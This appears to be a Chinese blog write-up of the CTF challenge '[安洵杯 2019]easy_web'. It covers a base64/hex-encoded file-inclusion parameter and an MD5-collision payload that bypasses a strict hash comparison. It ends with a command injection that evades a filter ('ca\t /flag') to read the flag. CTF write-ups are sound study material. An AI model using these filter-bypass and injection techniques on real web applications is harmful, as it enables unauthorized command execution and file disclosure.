[安洵杯 2019]easy_web

[安洵杯 2019]easy_web

1.打开网站,啥都么得,源码里面说 md5 is funny,扫目录也没扫到啥。看url有个cmd=
在这里插入图片描述
2.一开始是直接头铁bypass的,但是搞不出来:
[安洵杯 2019]easy_web_第1张图片
3.url中看到img参数,图片应该是通过参数的方式传递的,文件包含?但是这串密文我解不出来- -。看了WP,是这样的加密:

import binascii
import base64
filename = input().encode(encoding='utf-8')
hex = binascii.b2a_hex(filename)
base1 = base64.b64encode(hex)
base2 = base64.b64encode(base1)
print(base2.decode())

这里就要说一下我怀疑人生的地方了。

大家应该都知道http://ctf.ssleye.com/这个网站,我之前在进行凯撒解密的时候,它会把所有的字符转为小写!!坑的我没注意,base64解密不成功。
今天base64解密,不管什么编码都不行,
[安洵杯 2019]easy_web_第2张图片
但是我用其他网站可以:
[安洵杯 2019]easy_web_第3张图片
我用在线php可以:
[安洵杯 2019]easy_web_第4张图片
我py也解不出来= =应该是我太菜了。

两次base64之后,拿着字符串去https://tool.lu/hexstr/跑一下,发现图片名是:
[安洵杯 2019]easy_web_第5张图片

4.包含index.php文件
[安洵杯 2019]easy_web_第6张图片

http://4093671f-a317-46a0-9952-3c9dc586f177.node3.buuoj.cn/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=

源码里复制:
[安洵杯 2019]easy_web_第7张图片
[安洵杯 2019]easy_web_第8张图片
5.这里就是对我们输入的img参数值解码,然后进行正则替换,因为 “^” 是在方括号内部,所以它是代表非的意思,除了这些字符以外的字符都替换为空。
在这里插入图片描述
6.这里提示如果img参数解码后有flag,就输出一张图片,如果没有就包含文件,出于好奇心看看什么图片:
[安洵杯 2019]easy_web_第9张图片
[安洵杯 2019]easy_web_第10张图片
7.皮。下面就是正则替换掉很多字符,过滤$cmd,我们可以先用命令id测试能不能执行命令,再想绕过拿到flag。
在这里插入图片描述
8.然后下面是经过一层判断,然后执行cmd命令,“`”这个符号包围是执行shell命令的。
在这里插入图片描述
9.我们看到经过md5进行绝对等于的比较,这里是可以用数组绕过的,但是前面的数据经过了强制转换,导致前面的一部分判断不能满足:
[安洵杯 2019]easy_web_第11张图片
10.这里各位大哥想到了这个:

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

我在线跑了下,要记得url解码一次:(这里试了好久,头大)虽然知道是可以绕过的了,但是我还是不太明白原因(希望有大佬告知)。
[安洵杯 2019]easy_web_第12张图片
11.然后复制payload放进burp中跑,放hackbar会自动编码一次,是不行的。
[安洵杯 2019]easy_web_第13张图片
12.dir%20/ 看一下根目录文件,发现flag:
[安洵杯 2019]easy_web_第14张图片
13.直接cat /flag肯定要被之前的拦截的,ca\t%20/flag绕过:
[安洵杯 2019]easy_web_第15张图片

那个md5的绕过真的搞了好久,还是不太懂。

你可能感兴趣的:(CTF)